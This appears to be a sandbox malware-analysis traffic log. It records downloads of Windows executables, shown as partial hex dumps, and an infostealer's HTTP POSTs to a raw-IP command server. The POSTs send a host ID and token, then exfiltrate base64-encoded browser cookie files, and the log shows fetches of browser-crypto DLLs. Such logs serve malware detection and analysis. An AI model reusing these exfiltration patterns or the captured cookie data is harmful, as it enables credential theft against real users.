72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 15:56:16 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 
65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 15:56:17 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 
00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Jul 2024 15:56:19 GMTContent-Type: application/octet-streamContent-Length: 1939456Last-Modified: Fri, 26 Jul 2024 15:02:33 GMTConnection: keep-aliveETag: "66a3ba89-1d9800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 be 40 a2 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e6 04 00 00 ca 01 00 00 00 00 00 00 f0 4c 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 4d 00 00 04 00 00 36 78 1e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c dc 4c 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 cc db 4c 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 
ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 2b 00 00 b0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 74 6d 6b 73 62 62 74 00 80 1a 00 00 60 32 00 00 7e 1a 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 6f 73 6e 6c 65 65 68 00 10 00 00 00 e0 4c 00 00 04 00 00 00 72 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 f0 4c 00 00 22 00 00 00 76 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Jul 2024 15:56:21 GMTContent-Type: application/octet-streamContent-Length: 1895424Last-Modified: Fri, 26 Jul 2024 15:01:58 GMTConnection: keep-aliveETag: "66a3ba66-1cec00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 10 41 a2 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e6 04 00 00 ca 01 00 00 00 00 00 00 e0 4a 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 4b 00 00 04 00 00 28 4c 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 dc be 4a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8c be 4a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 dc 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 
ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 40 2a 00 00 b0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6f 77 66 6c 74 6b 69 69 00 e0 19 00 00 f0 30 00 00 d2 19 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6c 77 74 69 73 75 6f 75 00 10 00 00 00 d0 4a 00 00 06 00 00 00 c4 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 e0 4a 00 00 22 00 00 00 ca 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Jul 2024 15:57:04 GMTContent-Type: application/octet-streamContent-Length: 867038Last-Modified: Fri, 26 Jul 2024 15:52:44 GMTConnection: keep-aliveETag: "66a3c64c-d3ade"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 da e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 6e 00 00 00 ce 06 00 00 42 00 00 83 38 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 b0 0f 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 34 9b 00 00 b4 00 00 00 00 40 0f 00 90 59 00 00 00 00 00 00 00 00 00 00 3e 13 0d 00 a0 27 00 00 00 a0 07 00 64 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ae 6d 00 00 00 10 00 00 00 6e 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 62 2a 00 00 00 80 00 00 00 2c 00 00 00 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc 7e 06 00 00 b0 00 00 00 02 00 00 00 9e 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 10 08 00 00 30 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 90 59 00 00 00 40 0f 00 00 5a 00 00 00 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 32 0f 00 00 00 a0 0f 00 00 10 00 00 00 b2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:04 GMT Content-Type: application/octet-stream Content-Length: 250368 Last-Modified: Fri, 26 Jul 2024 15:47:14 GMT Connection: keep-alive ETag: "66a3c502-3d200" Accept-Ranges: bytes Data Raw: (hex dump omitted)
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:07 GMT Content-Type: application/octet-stream Content-Length: 311296 Last-Modified: Fri, 26 Jul 2024 15:36:02 GMT Connection: keep-alive ETag: "66a3c262-4c000" Accept-Ranges: bytes Data Raw: (hex dump omitted)
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:08 GMT Content-Type: application/octet-stream Content-Length: 91648 Last-Modified: Fri, 26 Jul 2024 15:01:21 GMT Connection: keep-alive ETag: "66a3ba41-16600" Accept-Ranges: bytes Data Raw: (hex dump omitted)
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:57:10 GMT Content-Type: application/octet-stream Content-Length: 2755072 Last-Modified: Fri, 26 Jul 2024 15:52:43 GMT Connection: keep-alive ETag: "66a3c64b-2a0a00" Accept-Ranges: bytes Data Raw: (hex dump omitted)
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 Host: 85.28.47.31 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIECFIEGDBKJKFIDHIEC Host: 85.28.47.31 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Ascii: ------GIECFIEGDBKJKFIDHIEC Content-Disposition: form-data; name="hwid" A1BB0AFA316D3392259749 ------GIECFIEGDBKJKFIDHIEC Content-Disposition: form-data; name="build" sila ------GIECFIEGDBKJKFIDHIEC--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAFIEHIEGDHIDGDGHDHJ Host: 85.28.47.31 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Ascii: ------DAFIEHIEGDHIDGDGHDHJ Content-Disposition: form-data; name="token" bbf2f65d29097cf3c1676c5922b032ea890af7e2d568002f72d1e31d83e157d19ccef130 ------DAFIEHIEGDHIDGDGHDHJ Content-Disposition: form-data; name="message" browsers ------DAFIEHIEGDHIDGDGHDHJ--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKEHIIJJECFHJKECFHDG Host: 85.28.47.31 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Ascii: ------JKEHIIJJECFHJKECFHDG Content-Disposition: form-data; name="token" bbf2f65d29097cf3c1676c5922b032ea890af7e2d568002f72d1e31d83e157d19ccef130 ------JKEHIIJJECFHJKECFHDG Content-Disposition: form-data; name="message" plugins ------JKEHIIJJECFHJKECFHDG--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIEHJKJJJECFHJJJKKEC Host: 85.28.47.31 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Ascii: ------IIEHJKJJJECFHJJJKKEC Content-Disposition: form-data; name="token" bbf2f65d29097cf3c1676c5922b032ea890af7e2d568002f72d1e31d83e157d19ccef130 ------IIEHJKJJJECFHJJJKKEC Content-Disposition: form-data; name="message" fplugins ------IIEHJKJJJECFHJJJKKEC--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IEHCAKKJDBKKFHJJDHII Host: 85.28.47.31 Content-Length: 6975 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/sqlite3.dll HTTP/1.1 Host: 85.28.47.31 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJKJJEGIDBGIDGCBAFHC Host: 85.28.47.31 Content-Length: 751 Connection: Keep-Alive Cache-Control: no-cache Data Ascii: ------KJKJJEGIDBGIDGCBAFHC Content-Disposition: form-data; name="token" bbf2f65d29097cf3c1676c5922b032ea890af7e2d568002f72d1e31d83e157d19ccef130 ------KJKJJEGIDBGIDGCBAFHC Content-Disposition: form-data; name="file_name" Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0 ------KJKJJEGIDBGIDGCBAFHC Content-Disposition: form-data; name="file" Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4Ym12
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGCBFIEHIEGCAAAKKKKE Host: 85.28.47.31 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Ascii: ------EGCBFIEHIEGCAAAKKKKE Content-Disposition: form-data; name="token" bbf2f65d29097cf3c1676c5922b032ea890af7e2d568002f72d1e31d83e157d19ccef130 ------EGCBFIEHIEGCAAAKKKKE Content-Disposition: form-data; name="file_name" c21qbGxteW1sYnpxLnB3ZA== ------EGCBFIEHIEGCAAAKKKKE Content-Disposition: form-data; name="file" ------EGCBFIEHIEGCAAAKKKKE--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AEGIJKEHCAKFCAKFHDAA Host: 85.28.47.31 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Ascii: ------AEGIJKEHCAKFCAKFHDAA Content-Disposition: form-data; name="token" bbf2f65d29097cf3c1676c5922b032ea890af7e2d568002f72d1e31d83e157d19ccef130 ------AEGIJKEHCAKFCAKFHDAA Content-Disposition: form-data; name="file_name" c21qbGxteW1sYnpxLnB3ZA== ------AEGIJKEHCAKFCAKFHDAA Content-Disposition: form-data; name="file" ------AEGIJKEHCAKFCAKFHDAA--
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/freebl3.dll HTTP/1.1 Host: 85.28.47.31 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/mozglue.dll HTTP/1.1 Host: 85.28.47.31 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/msvcp140.dll HTTP/1.1 Host: 85.28.47.31 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/nss3.dll HTTP/1.1 Host: 85.28.47.31 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/softokn3.dll HTTP/1.1 Host: 85.28.47.31 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/vcruntime140.dll HTTP/1.1 Host: 85.28.47.31 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KFHCAEGCBFHJDGCBFHDA Host: 85.28.47.31 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
